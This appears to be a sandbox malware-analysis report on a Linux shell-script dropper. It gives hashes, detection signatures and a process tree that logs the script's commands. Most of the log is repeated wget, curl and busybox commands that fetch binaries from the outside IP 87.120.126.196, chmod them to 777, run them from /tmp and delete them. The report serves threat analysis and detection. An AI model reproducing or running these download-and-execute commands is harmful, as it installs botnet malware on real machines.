Analysis
-
max time kernel
13s -
max time network
130s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
21/10/2024, 01:42
Static task
static1
Behavioral task
behavioral1
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
-
Size
10KB
-
MD5
24af39cdca62a1ed0bec6400cfa74142
-
SHA1
ad31bab8b77d23f47f5ca207a515dfed28a2bd5a
-
SHA256
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b
-
SHA512
24fd5e5bb157fe20152b4811bad30f52b5aa416a3faf7ae5c06d3e7fa6388dcb41d528a9aa87bb6c886380c2cf8457510bc89e7d08ae1096ae8d2da0e1f61476
-
SSDEEP
192:HMUrAEWq+TPsHnmpFoBZFD0+kolLMUrAEaTPsHncpFoBZf:HMUrAEWqF0FmMUrAEp
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh1⤵PID:1493
-
/bin/rm/bin/rm bins.sh2⤵PID:1494
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1495
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Writes file to tmp directory
PID:1500
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1501
-
-
/bin/chmodchmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- File and Directory Permissions Modification
PID:1502
-
-
/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Executes dropped EXE
PID:1503
-
-
/bin/rmrm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1504
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1505
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1507
-
-
/bin/chmodchmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Executes dropped EXE
PID:1509
-
-
/bin/rmrm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1510
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1511
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1513
-
-
/bin/chmodchmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1516
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1519
-
-
/bin/chmodchmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1525
-
-
/bin/chmodchmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1531
-
-
/bin/chmodchmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1537
-
-
/bin/chmodchmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1543
-
-
/bin/chmodchmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1546
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1549
-
-
/bin/chmodchmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1555
-
-
/bin/chmodchmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1561
-
-
/bin/chmodchmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1564
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1567
-
-
/bin/chmodchmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1570
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1573
-
-
/bin/chmodchmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1576
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1579
-
-
/bin/chmodchmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1582
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1583
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1585
-
-
/bin/chmodchmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1588
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1591
-
-
/bin/chmodchmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1594
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1597
-
-
/bin/chmodchmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1603
-
-
/bin/chmodchmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1609
-
-
/bin/chmodchmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1615
-
-
/bin/chmodchmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1621
-
-
/bin/chmodchmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1627
-
-
/bin/chmodchmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1633
-
-
/bin/chmodchmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1639
-
-
/bin/chmodchmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1645
-
-
/bin/chmodchmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1651
-
-
/bin/chmodchmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1657
-
-
/bin/chmodchmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1663
-
-
/bin/chmodchmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1666
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97